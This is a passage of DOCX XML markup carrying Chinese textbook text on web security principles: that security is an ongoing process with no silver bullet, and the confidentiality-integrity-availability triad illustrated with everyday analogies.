        <w:rPr/>
        <w:t>在解决安全问题的过程中，不可能一劳永逸，也就是说“没有银弹”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>一般来说，人们都会讨厌麻烦的事情，在潜意识里希望能够让麻烦越远越好。而安全，正</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>是一件麻烦的事情，而且是无法逃避的麻烦。任何人想要一劳永逸地解决安全问题，都属于一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>相情愿，是“自己骗自己”，是不现实的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:spacing w:before="156"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>安全是一个持续的过程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="304" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="187" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>自从互联网有了安全问题以来，攻击和防御技术就在不断碰撞和对抗的过程中得到发展。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>从微观上来说，在某一时期可能某一方占了上风；但是从宏观上来看，某一时期的攻击或防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>技术，都不可能永远有效，永远用下去。这是因为防御技术在发展的同时，攻击技术也在不断发展，两者是互相促进的辩证关系。以不变的防御手段对抗不断发展的攻击技术，就犯了刻舟求剑的错误。在安全的领域中，没有银弹。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="302" w:lineRule="auto" w:before="161"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>很多安全厂商在推销自己产品时，会向用户展示一些很美好的蓝图，似乎他们的产品无所</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>不能，购买之后用户就可以睡得安稳了。但实际上，安全产品本身也需要不断地升级，也需要</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="302" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="304" w:lineRule="auto" w:before="148"/>
        <w:ind w:left="203" w:right="125"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>有人来运营。产品本身也需要一个新陈代谢的过程，否则就会被淘汰。在现代的互联网产品中， 自动升级功能已经成为一个标准配置，一个有活力的产品总是会不断地改进自身。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="163"/>
        <w:ind w:left="203" w:right="218" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>微软在发布 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Vista </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>时，曾信誓旦旦地保证这是有史以来最安全的操作系统。我们看到了微</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
        </w:rPr>
        <w:t>软的努力，在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Vista </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>下的安全问题确实比它的前辈们</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Windows XP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-101"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Windows 2000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-101"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Windows 2003 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>少了许多，尤其是高危的漏洞。但即便如此，在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>2008 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t>年的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pwn2own </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>竞赛上，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Vista </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>也被黑</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>客们攻击成功。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pwn2own </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>竞赛是每年举行的让黑客们任意攻击操作系统的一次盛会，一般黑客</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>们都会提前准备好 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>0day </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>漏洞的攻击程序，以求在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Pwn2own </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>上一举夺魁。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>黑客们在不断地研究和寻找新的攻击技术，作为防御的一方，没有理由不持续跟进。微软</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>近几年在产品的安全中做得越来越好，其所推崇的安全开发流程，将安全检查贯穿于整个软件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>生命周期中，经过实践检验，证明这是一条可行的道路。对每一个产品，都要持续地实施严格</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>的安全检查，这是微软通过自身的教训传授给业界的宝贵经验。而安全检查本身也需要不断更新，增加针对新型攻击方式的检测与防御方案。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="903" w:val="left" w:leader="none"/>
          <w:tab w:pos="905" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="904" w:right="0" w:hanging="701"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250011" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>安全三要素</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="299"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>既然安全方案的设计与实施过程中没有银弹，注定是一个持续进行的过程，那么我们该如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>何开始呢？其实安全方案的设计也有着一定的思路与方法可循，借助这些方法，能够理清我们的思路，帮助我们设计出合理、优秀的解决方案。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>因为信任关系被破坏，从而产生了安全问题。我们可以通过信任域的划分、信任边界的确定，来发现问题是在何处产生的。这个过程可以让我们明确目标，那接下来该怎么做呢？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="160"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>在设计安全方案之前，要正确、全面地看待安全问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>要全面地认识一个安全问题，我们有很多种办法，但首先要理解安全问题的组成属性。前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>人通过无数实践，最后将安全的属性总结为安全三要素，简称 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CIA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="309" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="203" w:right="216" w:firstLine="400"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>安全三要素是安全的基本组成元素，分别是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-15"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>机密性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>li</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-99"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-22"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>、完整性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>te</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-99"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>可用性（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-17"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>va</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>il</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ili</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:spacing w:val="0"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-99"/>
          <w:w w:val="99"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="155"/>
        <w:ind w:left="606"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>机密性</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>要求保护数据内容不能泄露，加密是实现机密性要求的常见手段。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>比如在前文的例子中，如果文件不是放在抽屉里，而是放在一个透明的玻璃盒子里，那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>虽然外人无法直接取得文件，但因为玻璃盒子是透明的，文件内容可能还是会被人看到，所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>不符合机密性要求。但是如果给文件增加一个封面，掩盖了文件内容，那么也就起到了隐藏的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>效果，从而满足了机密性要求。可见，我们在选择安全方案时，需要灵活变通，因地制宜，没有一成不变的方案。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="152"/>
        <w:ind w:left="606"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>完整性</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>则要求保护数据内容是完整、没有被篡改的。常见的保证一致性的技术手段是数字</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="153"/>
        <w:ind w:left="203"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>签名。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="203" w:right="122" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>传说清朝康熙皇帝的遗诏，写的是“传位十四子”，被当时还是四阿哥的胤禛篡改了遗诏，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t>变成了“传位于四子”。姑且不论传说的真实性，在故事中，对这份遗诏的保护显然没有达到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>完整性要求。如果在当时有数字签名等技术，遗诏就很难被篡改。从这个故事中也可以看出数据的完整性、一致性的重要意义。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="153"/>
        <w:ind w:left="606"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>可用性</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>要求保护资源是“随需而得”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>假设一个停车场里有 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>100 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>个车位，在正常情况下，可以停 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>100 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>辆车。但是在某一天，有个</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="75"/>
        <w:ind w:left="203" w:right="221"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>坏人搬了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>100 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t>块大石头，把每个车位都占用了，停车场无法再提供正常服务。在安全领域中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>这种攻击叫做拒绝服务攻击，简称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="2"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
